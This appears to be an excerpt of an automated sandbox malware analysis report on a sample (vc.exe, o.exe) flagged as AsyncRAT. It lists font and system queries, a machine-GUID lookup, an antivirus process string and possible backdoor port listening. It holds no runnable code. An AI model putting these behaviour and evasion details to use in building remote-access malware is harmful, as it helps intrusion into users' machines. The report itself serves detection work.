Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation

Contains functionality to query local / system time

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_0125A093 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

14_2_0125A093

Contains functionality to query windows version

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_0125D220 memset,GetVersionExW,GetVersionExW,

14_2_0125D220

Queries the cryptographic machine GUID

Source: C:\Users\user\AppData\Local\Temp\o.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT

Source: Yara match	File source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vc.exe PID: 4896, type: MEMORY

AV process strings found (often used to terminate AV products)

Source: vc.exe, 00000020.00000002.534638947.0000000007643000.00000004.00000001.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_01257732 SetErrorMode,CorBindToRuntimeEx,SysFreeString,

14_2_01257732